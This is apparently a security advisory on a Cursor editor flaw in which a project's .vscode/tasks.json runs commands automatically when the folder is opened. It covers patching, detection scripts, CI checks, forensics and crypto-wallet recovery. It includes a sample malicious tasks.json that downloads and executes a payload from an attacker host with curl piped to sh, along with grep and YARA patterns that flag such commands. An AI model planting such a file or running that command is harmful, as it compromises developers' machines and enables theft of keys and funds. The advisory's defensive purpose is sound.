Back to list

Cursor AI Vulnerability — Risk of Cryptocurrency Theft

Уязвимость Cursor AI — риск кражи криптовалюты

Quick Action Plan

  • What happened: A critical vulnerability has been discovered in the Cursor AI editor, allowing remote code execution (RCE) when opening a malicious project folder.
  • Who is affected: Users of Cursor versions prior to 0.34.4. Web3 developers are at particular risk.
  • Urgent actions for developers:
    1. Update Cursor to version 0.34.4 or newer.
    2. Enable Workspace Trust in security settings.
    3. Scan projects for suspicious tasks.json files.
    4. Rotate keys and tokens if you have opened untrusted projects.

Introduction

In January 2024, the SlowMist cybersecurity team reported a critical vulnerability in Cursor—a popular AI-powered code editor. The issue allowed an attacker to execute arbitrary code on a developer's machine through the standard "Open Folder" function. This vulnerability turned a productivity tool into an attack vector aimed at stealing API keys, data, and cryptocurrency assets.

Timeline and Technical Details

The vulnerability arose from an automatic task execution feature inherited from VS Code, which was enabled by default in older versions of Cursor without sufficient precautions.

  • January 8, 2024 — SlowMist Report: Experts demonstrated a PoC attack, showing how a command embedded in the .vscode/tasks.json file is executed upon opening a project.
    Source: SlowMist Report.
  • January 9, 2024 — Patch Released: Anysphere, the company behind Cursor, released version 0.34.4, which enables the Workspace Trust feature by default to prevent automatic code execution.
    Source: Release 0.34.4 Changelog.

At the time of publication, this specific tasks.json vulnerability had not been assigned a unique CVE identifier. A search of the NVD and Mitre databases did not reveal a corresponding entry. The issue is inherited from the VS Code architecture and was resolved by implementing the Workspace Trust feature rather than fixing a specific bug in the Cursor code itself.

Affected Versions

StatusVersionsPatch Release DateRelease Link
VulnerableAll versions prior to 0.34.4
Secure0.34.4 and newerJanuary 9, 2024GitHub Releases

Technical Attack Vector and Proof-of-Concept (PoC)

The attack exploits the automatic task execution mechanism configured in the .vscode/tasks.json file within a project. When such a folder is opened in a vulnerable version of Cursor, the editor automatically executes the specified commands without user confirmation.

DANGER: DO NOT RUN IN A PRODUCTION ENVIRONMENT
The example below is a demonstration of the attack vector. Never run commands from untrusted sources. Even simply opening a project folder in a vulnerable environment can lead to automatic execution of malicious code and full system compromise.

Example of a malicious .vscode/tasks.json file:

{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "install dependencies",
      "type": "shell",
      "command": "curl -s http://attacker-example[.]com/payload.sh | sh",
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}

In this scenario, the curl command downloads and executes a malicious script from the attacker's server the moment the project folder is opened.

Action Plan: Protection and Response

Step 1: Immediate Actions (Within the Hour)

  1. Update Cursor AI: Immediately install the latest version (0.34.4+) from the official cursor.sh website or the releases page.
  2. Verify Release Integrity: Before installation, ensure the downloaded file has not been tampered with.
    • Linux/macOS: sha256sum -c sha256sums.txt --ignore-missing
    • Windows (PowerShell):
      (Get-FileHash 'Cursor.Setup.exe').Hash.ToLower() -eq ((Get-Content 'sha256sums.txt' | Select-String 'Cursor.Setup.exe').ToString().Split(' ')[0])
  3. Enable Workspace Trust: This feature, inherited from VS Code, prevents automatic code execution from untrusted projects. Cursor has a similar setting.
    • GUI: Go to Settings → Security → Workspace Trust and ensure the option is enabled.
    • settings.json: Set the flag "security.workspace.trust.enabled": true. You can read more about this feature in the VS Code documentation.
  4. Audit Projects: Use the scripts from the "Automated Verification" section to scan local repositories for suspicious tasks.json files.
  5. Rotate Keys: If you have opened suspicious projects, immediately change all API keys (AWS, Google Cloud, OpenAI), passwords, SSH keys, and access tokens.

Step 2: Long-Term Protection

  1. Isolate Environments: Use a separate, isolated environment (virtual machine, Docker container) for working with code from unverified sources.
  2. Principle of Least Privilege: Run development tools as a user with limited permissions.

Indicators of Compromise (IOCs)

File Indicators

  • Paths: Look for tasks.json files with suspicious content in .vscode/ folders within your projects.

  • Searching with grep:

    # Find tasks.json files containing the "folderOpen" autostart option
# Replace /path/to/projects with your project path
find /path/to/projects -type f -name "tasks.json" -exec grep -l '"runOn": "folderOpen"' {} +

# Search for suspicious commands (curl|sh, wget, eval, base64)
find /path/to/projects -type f -name "tasks.json" -exec grep -H -E 'sh -c|eval\(|curl|wget|base64\s-d' {} +

  • YARA Rule for tasks.json:

    rule Suspicious_Cursor_Tasks_Json {
  meta:
    description = "Detects tasks.json configured to run on folderOpen with suspicious commands"
    author = "Threat Research Team"
    date = "2024-01-15"
  strings:
    $file = "tasks.json" nocase
    $run_on = /"runOn"\s*:\s*"folderOpen"/
    $cmd_curl = /"command"\s*:\s*".*(curl|wget).*|.*(sh|bash|zsh)\s*"/
    $cmd_eval = /"command"\s*:\s*".*eval\s*\(.*\).*/
  condition:
    uint32(0) == 0x7B227665 and // fast check for '{"ve'
    $file and $run_on and 1 of ($cmd*)
}

Network Indicators

  • Suspicious Domains: DNS queries to domains on free hosting or dynamic DNS (*.ddns.net, *.no-ip.com, *.xyz, *.top).
  • Traffic Analysis: Look for outgoing connections from node, python, sh, or bash processes launched as child processes of Cursor.
    • Linux/macOS: sudo ss -tulpn | grep -E 'node|python|sh'
    • Windows (PowerShell):
      Get-NetTCPConnection -State Established | Where-Object { ($proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue) -and ($proc.ProcessName -in 'node','python','sh') }

Automated Verification of Working Directories

Use these scripts to bulk-scan projects for malicious tasks.json files.

Instructions:

  1. Save the script to a file (e.g., scan.sh or scan.ps1).
  2. Run it, specifying the path to the root folder of your projects.
  3. Important: If the script finds suspicious files, do not open those projects. Analyze them in an isolated environment.

Script for Linux/macOS (Bash):

#!/bin/bash
SEARCH_DIR="${1:-.}"
echo "Scanning for potentially malicious tasks.json in '$SEARCH_DIR'..."
find "$SEARCH_DIR" -type f -name "tasks.json" | while read -r file; do
  if grep -q '"runOn": "folderOpen"' "$file" && grep -q -E 'curl|wget|bash -c|sh -c|eval|base64' "$file"; then
    echo "!!! SUSPICIOUS FILE DETECTED: $file"
  fi
done
echo "Scan complete."

Script for Windows (PowerShell):

param (
    [Parameter(Mandatory=$true)]
    [string]$Path
)
Write-Host "Scanning for potentially malicious tasks.json in '$Path'..."
Get-ChildItem -Path $Path -Recurse -Filter "tasks.json" -File | ForEach-Object {
    $content = Get-Content $_.FullName -Raw
    if ($content -match '"runOn": "folderOpen"' -and $content -match '(curl|wget|bash -c|sh -c|eval|base64)') {
        Write-Host "!!! SUSPICIOUS FILE DETECTED: $($_.FullName)" -ForegroundColor Red
    }
}
Write-Host "Scan complete."

Recommendations for Security and DevOps Teams

  • CI/CD Integration: Add a step to the CI pipeline that scans the repository for tasks.json files containing runOn: folderOpen.

    Example for GitHub Actions:

    - name: Scan for dangerous tasks.json
  run: |
    if find . -type f -name "tasks.json" -exec grep -q '"runOn": "folderOpen"' {} +; then
      echo "::error::Dangerous 'runOn: folderOpen' found in tasks.json!"
      exit 1
    fi

  • Pre-commit Hooks: Implement local pre-commit hooks to perform a similar check before committing.

  • Repository Policies: Configure CODEOWNERS in GitHub so that changes to .vscode/ require mandatory review from the security team.

  • EDR/IDS Rules: Create rules to monitor and alert when the editor process spawns child processes like curl, wget, or sh -c.

Forensics and Incident Response

  1. Isolate the Machine: Immediately disconnect it from the network. Do not power off to preserve data in RAM for analysis.
  2. Collect Artifacts (for Professionals):
    • RAM Image: Use FTK Imager or Belkasoft RAM Capturer.
    • System Logs: Event Viewer (Windows), /var/log/ (Linux), ~/Library/Logs/ (macOS).
    • Cursor Logs: %APPDATA%\Cursor\logs (Windows), ~/.config/Cursor/logs (Linux), ~/Library/Application Support/Cursor/logs (macOS).
    • Processes and Connections: Save the output of ps aux and sudo ss -tulpn (Linux/macOS) or Get-Process and Get-NetTCPConnection (PowerShell).
  3. Contact Specialists: In a corporate environment, contact your Incident Response (IR/CSIRT) team.

What to Do with a Compromised Crypto Wallet

WARNING: Do not act hastily. Attackers use automated scripts (sweeper bots) that instantly steal any assets arriving at a compromised address (e.g., ETH for gas fees).

  1. Do not fund the compromised wallet. Any funds sent to pay for transaction fees will be immediately stolen.
  2. Create a new wallet on a guaranteed clean device. The ideal option is a hardware wallet (Ledger, Trezor).
  3. Plan asset recovery. To withdraw tokens, you will need to outpace the bot. Use private transaction services like Flashbots to send the transaction directly to a miner/validator, bypassing the public mempool. This is a complex procedure that requires expert assistance.
  4. Notify exchanges and analytics services. If funds were transferred to a centralized exchange, contact their support immediately, providing the TxID and attacker addresses.
  5. Never use the compromised wallet again. Abandon it forever.

Conclusion

The Cursor incident is a critical reminder that the convenience of AI tools should not come at the cost of security. The responsibility for data protection lies with every developer. Keep your software updated, enable protective mechanisms like Workspace Trust, and treat any downloaded code as potentially dangerous.

If you discover a vulnerability, report it responsibly to the developers at security@anysphere.co or via SECURITY.md in the project repository.

Tags

cursor ai vulnerability
remote code execution rce
cryptocurrency theft risk
web3 security
vs code tasks.json exploit